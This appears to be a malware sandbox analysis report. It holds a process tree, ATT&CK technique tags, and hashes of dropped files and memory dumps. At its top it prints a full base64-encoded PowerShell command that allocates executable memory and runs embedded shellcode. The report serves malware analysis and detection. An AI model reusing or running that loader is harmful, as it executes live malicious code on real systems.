      "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -enc JAA4AEEAMgBCACAAPQAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAOABBADIAQgAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQAgADAAeABiADgALAAwAHgAMgA1ACwAMAB4ADQAYQAsADAAeAA4AGIALAAwAHgAZQAwACwAMAB4AGQAYgAsADAAeABjAGMALAAwAHgAZAA5ACwAMAB4ADcANAAsADAAeAAyADQALAAwAHgAZgA0ACwAMAB4ADUAZQAsADAAeAAyADkALAAwAHgAYwA5ACwAMAB4AGIAMQAsADAAeAA0AGIALAAwAHgAMwAxACwAMAB4ADQANgAsADAAeAAxADIALAAwAHgAMAAzACwAMAB4ADQANgAsADAAeAAxADIALAAwAHgAOAAzACwAMAB4AGMAYgAsADAAeABiADYALAAwAHgANgA5ACwAMAB4ADEANQAsADAAeABlAGYALAAwAHgAYQBmACwAMAB4AGUAMQAsADAAeABkADYALAAwAHgAMABmACwAMAB4ADMAMAAsADAAeAA5AGUALAAwAHgAZQA3ACwAMAB4AGQAZAAsADAAeABiADkALAAwAHgAYgBiACwAMAB4ADYAYwAsADAAeAA2AGEALAAwAHgAZQBiACwAMAB4ADcAMwAsADAAeABlADYALAAwAHgAMwBlACwAMAB4ADAAMAAsADAAeABmAGYALAAwAHgAYQBhACwAMAB4AGEAYQAsADAAeAAxADcALAAwAHgANAA4ACwAMAB4ADAAMAAsADAAeABmADQALAAwAHgAYQBjACwAMAB4AGMANAAsADAAeABiAGQALAAwAHgAYwA5ACwAMAB4ADQAZAAsADAAeAAxADkALAAwAHgANwBlACwAMAB4ADgANQAsADAAeAA4AGUALAAwAHgAMwBiACwAMAB4ADAAMgAsADAAeABkADcALAAwAHgAYwAyACwAMAB4ADkAYgAsADAAeAAzAGIALAAwAHgAMQA4ACwAMAB4ADEANwAsADAAeABkAGQALAAwAHgANwBjACwAMAB4AGUAZgAsADAAeAA1AGQALAAwAHgAMwAyACwAMAB4AGQAMAAsADAAeABiADgALAAwAHgAMQA2ACwAMAB4ADkAZQAsADAAeABjADUALAAwAHgAYwBkACwAMAB4ADYAYgAsADAAeAAyADMALAAwAHgAZQA3ACwAMAB4ADAAMQAsADAAeABlADAALAAwAHgAMQBiACwAMAB4ADkAZgAsADAAeAAyADQALAAwAHgAMwA3ACwAMAB4AGUAZgAsADAAeAAxADMALAAwAHgAMgA3ACwAMAB4ADYAOAAsADAAeAA5AGIALAAwAHgAZgA0ACwAMAB4ADAANwAsADAAeABkADgALAAwAHgAMQA3ACwAMAB4ADQAYwAsADAAeAA1AGYALAAwAHgAZAA5ACwAMAB4AGYANAAsADAAeABjADgALAAwAHgAOQA2ACwAMAB4AGEAZAAsADAAeABjADYALAAwAHgAZQAzACwAMAB4AGQANwAsADAAeAAwADcALAAwAHgAYgBjACwAMAB4ADMAMAAsADAAeABhAGMALAAwAHgAOQA5ACwAMAB4ADEANAAsADAAeAAwADkALAAwAHgANwAyACwAMAB4ADMANQAsADAAeAA1ADkALAAwAHgAYQA1ACwAMAB4ADcAZgAsADAAeAA0ADcALAAwAHgAOQBkACwAMAB4ADAAMgAsADAAeAA5AGYALAAwAHgAMwAyACwAMAB4AGQANQAsADAAeAA3ADAALAAwAHgAMgAyACwAMAB4ADQANQAsADAAeAAyAGUALAAwAHgAMABhACwAMAB4AGYAOAAsADAAeABjADAALAAwAHgAYgAxACwAMAB4AGEAYwAsADAAeAA4AGIALAAwAHgANwAzACwAMAB4ADEANgAsADAAeAA0AGMALAAwAHgANQA4ACwAMAB4AGUANQAsADAAeABkAGQALAAwAHgANAAyACwAMAB4ADEANQAsADAAeAA2ADEALAAwAHgAYgA5ACwAMAB4ADQANgAsADAAeABhADgALAAwAHgAYQA2ACwAMAB4AGIAMQAsADAAeAA3ADMALAAwAHgAMgAxACwAMAB4ADQAOQAsADAAeAAxADYALAAwAHgAZgAyACwAMAB4ADcAMQAsADAAeAA2AGUALAAwAHgAYgAyACwAMAB4ADUAZQAsADAAeAAyADIALAAwAHgAMABmACwAMAB4AGUAMwAsADAAeAAzAGEALAAwAHgAOAA1ACwAMAB4ADMAMAAsADAAeABmADMALAAwAHgAZQAzACwAMAB4ADcAYQAsADAAeAA5ADUALAAwAHgANwBmACwAMAB4ADAAMQAsADAAeAA2AGQALAAwAHgAYQA5ACwAMAB4ADcAZgAsADAAeABkADkALAAwAHgAOQAyACwAMAB4AGYANwAsADAAeAAxADcALAAwAHgAMQA1ACwAMAB4ADUAZQAsADAAeAAwADgALAAwAHgAZQA4ACwAMAB4ADMAMQAsADAAeABlADkALAAwAHgANwBiACwAMAB4AGQAYQAsADAAeAA5AGUALAAwAHgANAAxACwAMAB4ADEANAAsADAAeAA1ADYALAAwAHgANQA2ACwAMAB4ADQAZgAsADAAeABlADMALAAwAHgAZQBmACwAMAB4ADcAMAAsADAAeAA3ADAALAAwAHgAMwBiACwAMAB4ADUANwAsADAAeAAxADAALAAwAHgAOABmACwAMAB4AGIAYwAsADAAeABhADgALAAwAHgAMwA4ACwAMAB4ADQAYgAsADAAeABlADgALAAwAHgAZgA4ACwAMAB4ADUAMgAsADAAeAA3AGEALAAwAHgAOQAxACwAMAB4ADkAMgAsADAAeABhADIALAAwAHgAOAAzACwAMAB4ADQANAAsADAAeAAwAGUALAAwAHgAYQA5ACwAMAB4ADEAMwAsADAAeABhADcALAAwAHgANgA3ACwAMAB4AGEAYwAsADAAeAA4AGQALAAwAHgANABmACwAMAB4ADcAYQAsADAAeABhAGYALAAwAHgANAAwACwAMAB4AGMAYwAsADAAeABmADMALAAwAHgANAA5ACwAMAB4ADMAMgAsADAAeABiAGMALAAwAHgANQAzACwAMAB4AGMANgAsADAAeABmADIALAAwAHgANgBjACwAMAB4ADEANAAsADAAeABiADYALAAwAHgAOQBhACwAMAB4ADYANgAsADAAeAA5AGIALAAwAHgAZQA5ACwAMAB4AGIAYQAsADAAeAA4ADgALAAwAHgANwAxACwAMAB4ADgAMgAsADAAeAA1ADAALAAwAHgANgA3ACwAMAB4ADIAYwAsADAAeABmAGEALAAwAHgAYwBjACwAMAB4ADEAZQAsADAAeAA3ADUALAAwAHgANwAwACwAMAB4ADYAZAAsADAAeABkAGUALAAwAHgAYQAzACwAMAB4AGYAYwAsADAAeABhAGQALAAwAHgANQA0ACwAMAB4ADQAMAAsADAAeAAwADAALAAwAHgANgAzACwAMAB4ADkAZAAsADAAeAAyAGQALAAwAHgAMQAyACwAMAB4ADEAMwAsADAAeAA2AGQALAAwAHgANwA4ACwAMAB4ADQAOAAsADAAeABiADUALAAwAHgANwAyACwAMAB4ADUANgAsADAAeABlADcALAAwAHgAMwA5ACwAMAB4AGUANwAsADAAeAA1AGQALAAwAHgAYQBlACwAMAB4ADYAZQAsADAAeAA5AGYALAAwAHgANQBmACwAMAB4ADkANwAsADAAeAA1ADgALAAwAHgAMAAwACwAMAB4ADkAZgAsADAAeABmADIALAAwAHgAZAAzACwAMAB4ADgAOQAsADAAeAAzADUALAAwAHgAYgBkACwAMAB4ADgAYgAsADAAeABmADUALAAwAHgAZAA5ACwAMAB4ADMAZAAsADAAeAA0AGIALAAwAHgAYQAwACwAMAB4AGIAMwAsADAAeAAzAGQALAAwAHgAMgAzACwAMAB4ADEANAAsADAAeABlADAALAAwAHgANgBkACwAMAB4ADUANgAsADAAeAA1AGIALAAwAHgAMwBkACwAMAB4ADAAMgAsADAAeABjAGIALAAwAHgAYwBlACwAMAB4AGIAZQAsADAAeAA3ADMALAAwAHgAYgA4ACwAMAB4ADUAOQAsADAAeABkADcALAAwAHgANwA5ACwAMAB4AGUANwAsADAAeABhAGUALAAwAHgANwA4ACwAMAB4ADgAMQAsADAAeABjADIALAAwAHgAMgBlACwAMAB4ADQANAAsADAAeAA1ADQALAAwAHgAMgBhACwAMAB4ADQANQAsADAAeABhADQALAAwAHgANgA0ADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJABoAFoAaQA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAGcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHoALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAaQArACsAKQAgAHsAJAB3ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAaABaAGkALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAGgAWgBpACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7AA==
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1152
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zzd0ufjd\zzd0ufjd.cmdline"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:772
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES87BE.tmp" "c:\Users\Admin\AppData\Local\Temp\zzd0ufjd\CSC38F10B06DAC43728B8F6ABFE641E21.TMP"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4112

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES87BE.tmp

Filesize
1KB

MD5
5b8e9b555ee9b9eeb50137e1f8914229

SHA1
3ee826b0c9d0e33b320f37546b31020daaf4f2c6

SHA256
65c6e4c26ab2e20104185d701b9c30f5a46f28853603e707bd14b2fe0b34c577

SHA512
960df186571fbf627465bab14ed778403bcbbbcc6ab7b62bc26b58770c1683a427a6bd30b520fc2689bbeb9d3e4f62f0dff0662004388c3ac876eab7d563f0f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qbbgf3dt.fau.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\zzd0ufjd\zzd0ufjd.dll

Filesize
3KB

MD5
26927b8b10fc0d45482d1bb288f2e1df

SHA1
b09e8847b2fca7444561f556e719cb4bbe6dace7

SHA256
5f7f110c6299132ee630417c906952563feaf37cd32bb5fb0c2b156db69f94eb

SHA512
b618e03efc88380cd334ecf88db7b75d8b43172a9c1fc39c52032b80b3db8827cc2c2b209f17b11dbf3069160d5da829c64e712daf633aaff90b0d1c77651600

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\zzd0ufjd\CSC38F10B06DAC43728B8F6ABFE641E21.TMP

Filesize
652B

MD5
1321a99690a2c434b985e57dd08f8b56

SHA1
07a5524a3a08f470c250126a4b83b8768bb813e2

SHA256
bb0c02182766dda61f436e9e61f939e7c727ed6644515da58409533e3f28817d

SHA512
b91c4ece845a839cd32b6a7758053ae9bb0721bc257d64bd7a3f91c075d3e06b77154fed2622016342de4f2ee304c5424fae97edd036eac28986f00683f87b46

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\zzd0ufjd\zzd0ufjd.0.cs

Filesize
557B

MD5
7319070c34daa5f6f2ece2dfc07119ee

SHA1
f26a4a48518a5608e93c8b77368f588b0433973c

SHA256
b240a9bb4f72d886522e19fa40b9c688fa94c1bd6dc7b7185f94e4466273a5dc

SHA512
34169fc9fb0cd2381c45efcd22ec1bc659ef513e73bc4c7bcb91ca1d5129a1a149e9f75297acb4958e52ff04d75e6e121232dbc0657611e41b63f10aa3e1d6bd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\zzd0ufjd\zzd0ufjd.cmdline

Filesize
369B

MD5
ace43762f7b2693fdff0a48621aad7f0

SHA1
8757ee327d14d81a9a00f4b8ed49bcf5df9508ed

SHA256
b0bb77bd20337cab4ce02d8550e529bf206f7067d90545a472192fd67d29cdea

SHA512
ac7549a17a9b5beb0e0ba380ace1a46636eb255dd462adbcee28c7a94f7546962d4f29e8a849c4ea4ac51d70ccb986f314e73b1e77dde389e7321d84fcc0f205

Download Submit
memory/1152-15-0x000000007496E000-0x000000007496F000-memory.dmp

Filesize
4KB

Download
memory/1152-35-0x0000000008110000-0x000000000878A000-memory.dmp

Filesize
6.5MB

Download
memory/1152-16-0x0000000003350000-0x0000000003386000-memory.dmp

Filesize
216KB

Download
memory/1152-17-0x0000000074960000-0x0000000075110000-memory.dmp

Filesize
7.7MB

Download
memory/1152-18-0x0000000005C30000-0x0000000006258000-memory.dmp

Filesize
6.2MB

Download
memory/1152-19-0x0000000074960000-0x0000000075110000-memory.dmp

Filesize
7.7MB

Download
memory/1152-20-0x0000000005A60000-0x0000000005A82000-memory.dmp

Filesize
136KB

Download
memory/1152-21-0x0000000006260000-0x00000000062C6000-memory.dmp

Filesize
408KB

Download
memory/1152-22-0x00000000062D0000-0x0000000006336000-memory.dmp

Filesize
408KB

Download
memory/1152-28-0x0000000006340000-0x0000000006694000-memory.dmp

Filesize
3.3MB

Download
memory/1152-33-0x0000000006940000-0x000000000695E000-memory.dmp

Filesize
120KB

Download
memory/1152-34-0x0000000006960000-0x00000000069AC000-memory.dmp

Filesize
304KB

Download
memory/1152-36-0x0000000007A00000-0x0000000007A1A000-memory.dmp

Filesize
104KB

Download
memory/1152-55-0x0000000074960000-0x0000000075110000-memory.dmp

Filesize
7.7MB

Download
memory/1152-54-0x000000007496E000-0x000000007496F000-memory.dmp

Filesize
4KB

Download
memory/1152-51-0x0000000007B00000-0x0000000007B01000-memory.dmp

Filesize
4KB

Download
memory/1152-49-0x0000000007A90000-0x0000000007A98000-memory.dmp

Filesize
32KB

Download
memory/4156-2-0x0000024D4CF10000-0x0000024D4CF32000-memory.dmp

Filesize
136KB

Download
memory/4156-12-0x00007FFBF6CA0000-0x00007FFBF7761000-memory.dmp

Filesize
10.8MB

Download
memory/4156-13-0x00007FFBF6CA0000-0x00007FFBF7761000-memory.dmp

Filesize
10.8MB

Download
memory/4156-53-0x00007FFBF6CA0000-0x00007FFBF7761000-memory.dmp

Filesize
10.8MB

Download
memory/4156-14-0x00007FFBF6CA0000-0x00007FFBF7761000-memory.dmp

Filesize
10.8MB

Download
memory/4644-1-0x0000000000710000-0x000000000071A000-memory.dmp

Filesize
40KB

Download
memory/4644-52-0x00007FFBF6CA3000-0x00007FFBF6CA5000-memory.dmp

Filesize
8KB

Download
memory/4644-0-0x00007FFBF6CA3000-0x00007FFBF6CA5000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads